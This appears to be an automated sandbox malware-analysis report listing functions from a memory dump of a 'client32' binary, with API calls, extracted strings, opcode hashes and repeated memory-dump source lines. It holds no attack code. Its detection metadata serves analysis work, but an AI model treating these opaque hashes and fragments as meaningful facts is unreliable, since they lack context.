                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception$Copy_strExceptionRaiseXinvalid_argumentstd::_std::exception::_
                                                        • String ID:
                                                        • API String ID: 3482316527-0
                                                        • Opcode ID: 48381950686fee35f6dc86805a6ff2cf8b1dc353233030c430b72cf3119b753e
                                                        • Instruction ID: 34a656192ea29ff877c28e50c2c63445a0478e0dc2d9df183b14054e6d04c7b1
                                                        • Opcode Fuzzy Hash: 48381950686fee35f6dc86805a6ff2cf8b1dc353233030c430b72cf3119b753e
                                                        • Instruction Fuzzy Hash: 89319279A0470AEFD320DF64D850AABB3F9FB44704F104969E96A97641D770F904CBA2
                                                        Function 110E1410 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 136COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetLastError.KERNEL32(00000057,03062EA0,00000001,00000000,00000000,75A45440,?,00000000,1112A233), ref: 110E1564
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        • m_plugin_table[pluginid] == NULL, xrefs: 110E1490
                                                        • NSSClientPlugin.cpp, xrefs: 110E148B
                                                        • InitPlugin(0x%08x, %d), xrefs: 110E1442
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$ExitMessageProcesswsprintf
                                                        • String ID: InitPlugin(0x%08x, %d)$NSSClientPlugin.cpp$m_plugin_table[pluginid] == NULL
                                                        • API String ID: 73808336-146751015
                                                        • Opcode ID: fdae3d6caeb60e4e86b8a54e0c4a4c1f33da6f1cecb8f821e4c4b66ddad970f7
                                                        • Instruction ID: ad6bb8f3b253fbe3b6a656bc4dae6ed0cb60087fd9fc08c2cee8f6ee06ca03d3
                                                        • Opcode Fuzzy Hash: fdae3d6caeb60e4e86b8a54e0c4a4c1f33da6f1cecb8f821e4c4b66ddad970f7
                                                        • Instruction Fuzzy Hash: 1A41A676E0625AAFDB11CB6A8C44BDEBBE4AF55754F044169EC0697380EA70DA0087E1
                                                        Function 11153123 Relevance: 6.1, APIs: 4, Instructions: 130COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                        • String ID:
                                                        • API String ID: 2782032738-0
                                                        • Opcode ID: 534529e158e4db515927ccc196ef3b21eb4e7e2ebd5444ad79e5c81968efa83f
                                                        • Instruction ID: 755ba38bf884ac0eeaaa92c0afe6aec453c5cd012c1134b2337e0c48102fae43
                                                        • Opcode Fuzzy Hash: 534529e158e4db515927ccc196ef3b21eb4e7e2ebd5444ad79e5c81968efa83f
                                                        • Instruction Fuzzy Hash: FD410631A18A05EBDBD58FB5C9C065EFBB6AF82364F25852CD47597280EB70EA41CB40
                                                        Function 111670B8 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 111670EC
                                                        • __isleadbyte_l.LIBCMT ref: 1116711F
                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,11167B23,00000109,00BFBBEF,00000003), ref: 11167150
                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,11167B23,00000109,00BFBBEF,00000003), ref: 111671BE
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                        • String ID:
                                                        • API String ID: 3058430110-0
                                                        • Opcode ID: 70553f7c7fafef29c21006f25f5c2dae4ac7e8c976c213a9198f9563594dea5c
                                                        • Instruction ID: a790c682b384103f3dc3b94a9d53280dae5bf4498d54a0adc54a3abaf1072143
                                                        • Opcode Fuzzy Hash: 70553f7c7fafef29c21006f25f5c2dae4ac7e8c976c213a9198f9563594dea5c
                                                        • Instruction Fuzzy Hash: 7931E531600656EFDB01DF64CD809ADBFBEBF02355F11896AE4608B191F7B2D960CB61
                                                        Function 1103B280 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 68sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNEL32(000001F4,00000000,?,00000000,-111D903C), ref: 1103B2B1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID: /weblock.htm$:%u$redirect:http://127.0.0.1
                                                        • API String ID: 3472027048-2181447511
                                                        • Opcode ID: 6a60cb9f04780bf1a4e56164c16ea68f90256d0685b113d35d93a91b141b9392
                                                        • Instruction ID: 163816d6f2ef246cfcbc0681839aaf7e4393b709d4332236b9ae6e4fd5f74bc1
                                                        • Opcode Fuzzy Hash: 6a60cb9f04780bf1a4e56164c16ea68f90256d0685b113d35d93a91b141b9392
                                                        • Instruction Fuzzy Hash: 4E110876E01116ABFB10DB64DC51FBEB7A99B5270CF0441E9EC0D97280DE607E048BE1
                                                        Function 110ED0F0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemMetrics.USER32(00000000), ref: 110ED100
                                                        • GetSystemMetrics.USER32(0000004C), ref: 110ED123
                                                        • GetSystemMetrics.USER32(0000004D), ref: 110ED12A
                                                        • GetSystemMetrics.USER32(00000001), ref: 110ED131
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MetricsSystem
                                                        • String ID:
                                                        • API String ID: 4116985748-0
                                                        • Opcode ID: e716a7c15c148c3bce95d1910b8bb650b858a5736b8f708ee99cec207b1cb7ae
                                                        • Instruction ID: 83fd5bc5d8da2d79fb4b26aef42fb772e3a20f1d5eeb9d88145602deba3fecb7
                                                        • Opcode Fuzzy Hash: e716a7c15c148c3bce95d1910b8bb650b858a5736b8f708ee99cec207b1cb7ae
                                                        • Instruction Fuzzy Hash: 07018435701215AFF340DA6DCC91F6A77D9EF887A4F108166FA18CB281DAB1EC008BE0
                                                        Function 110071D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 11007327
                                                        • SetFocus.USER32(?), ref: 11007383
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                        • String ID: edit
                                                        • API String ID: 1305092643-2167791130
                                                        • Opcode ID: 27315c5d1f7352d15abcfce75e4c126172236694e22f52a29f659be4a097c581
                                                        • Instruction ID: de039c6dd70e6cc582895792d79c964172256b88ad53612648e90ac57d52fd2d
                                                        • Opcode Fuzzy Hash: 27315c5d1f7352d15abcfce75e4c126172236694e22f52a29f659be4a097c581
                                                        • Instruction Fuzzy Hash: F4518FB6A00606AFE741CF68DC80BABB7E5FB89354F11856DF955C7340EA34E942CB60
                                                        Function 110091F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Xinvalid_argument.LIBCPMT ref: 11009265
                                                        • _memmove.LIBCMT ref: 110092B6
                                                          • Part of subcall function 11008D50: std::_Xinvalid_argument.LIBCPMT ref: 11008D6A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Xinvalid_argumentstd::_$_memmove
                                                        • String ID: string too long
                                                        • API String ID: 2168136238-2556327735
                                                        • Opcode ID: 9dfb108bb060dbe814511fcf92a59b01b61276c30512c891ce2dcd2ce0dbaaee
                                                        • Instruction ID: 3a6cd60558af0b1eb5e54a62a16ab8d1ec8c1d39fd4bf56391ab3766311947f4
                                                        • Opcode Fuzzy Hash: 9dfb108bb060dbe814511fcf92a59b01b61276c30512c891ce2dcd2ce0dbaaee
                                                        • Instruction Fuzzy Hash: 2031F832B04A105BF320DE9CE88099AF7EDEBE57A4B200A1FE589C7640E7719C4087A0
                                                        Function 11037320 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _strtok.LIBCMT ref: 1103734C
                                                          • Part of subcall function 11151A96: __getptd.LIBCMT ref: 11151AB4
                                                        • _strtok.LIBCMT ref: 1103741C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _strtok$__getptd
                                                        • String ID: ; >
                                                        • API String ID: 715173073-2207967850
                                                        • Opcode ID: 83b7e2a6cbd220261976a2cc7d86380cb3eec4cdc2f60ae252d597ced3692ed7
                                                        • Instruction ID: f7621361e6c596b186c407d080d6d1f1d77a3e25de21221ea8e27b6559dd514c
                                                        • Opcode Fuzzy Hash: 83b7e2a6cbd220261976a2cc7d86380cb3eec4cdc2f60ae252d597ced3692ed7
                                                        • Instruction Fuzzy Hash: 50316D36D10A6A6FDB12CAA48C41BDEFBE4DF8035AF158494DC94AB340E730BD4587E1
                                                        Function 110F9200 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • std::exception::exception.LIBCMT ref: 110F9259
                                                        • __CxxThrowException@8.LIBCMT ref: 110F926E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                        • String ID: SERVICE_STOPPED
                                                        • API String ID: 1338273076-2952185856
                                                        • Opcode ID: 7863cd1019f7c507a980daf9cc18c30ca2e51dd9cb744989036ea746dc30ae22
                                                        • Instruction ID: 861a20010b97cda9c46bc73d43b4561baa07196ef4a1bd06c3ab550d4ae6c7c8
                                                        • Opcode Fuzzy Hash: 7863cd1019f7c507a980daf9cc18c30ca2e51dd9cb744989036ea746dc30ae22
                                                        • Instruction Fuzzy Hash: 0D21DEBAA00205ABC314DFA8EC40EDBF7E8AF94750B00852AE95987740EA71FA50C7D1
                                                        Function 1100F210 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Xinvalid_argument.LIBCPMT ref: 1100F22B
                                                          • Part of subcall function 1114EE63: std::exception::exception.LIBCMT ref: 1114EE78
                                                          • Part of subcall function 1114EE63: __CxxThrowException@8.LIBCMT ref: 1114EE8D
                                                          • Part of subcall function 1114EE63: std::exception::exception.LIBCMT ref: 1114EE9E
                                                        • std::_Xinvalid_argument.LIBCPMT ref: 1100F242
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                        • String ID: string too long
                                                        • API String ID: 963545896-2556327735
                                                        • Opcode ID: b3d1314d947281a894f8efd54b95a9e12544f938a1616c6a14e75e78f85f9d23
                                                        • Instruction ID: 4ae5dbe98dc33b486374ed3c743d77287fa05e59300f19889e7a737380275ccf
                                                        • Opcode Fuzzy Hash: b3d1314d947281a894f8efd54b95a9e12544f938a1616c6a14e75e78f85f9d23
                                                        • Instruction Fuzzy Hash: DC11D6377046108BF321D9ADE880BAAF7D9EFE57B4F20065FE59187640C7A1A84087A2
                                                        Function 110D55B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11008D50: std::_Xinvalid_argument.LIBCPMT ref: 11008D6A
                                                        • OutputDebugStringA.KERNEL32(111D8BD0,000000FF,NsAppSystem::CNsAsException::CNsAsException,0000002B,111D8BD0,00000000,000000FF,82E0FB89,?,00000000,00000000,?,?,?,00000000,111761AB), ref: 110D5663
                                                        • OutputDebugStringA.KERNEL32(1118BEE8,?,?,?,00000000,111761AB,000000FF,?,110D2C63,?,Invalid Server paramters), ref: 110D566A
                                                        Strings
                                                        • NsAppSystem::CNsAsException::CNsAsException, xrefs: 110D560D
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
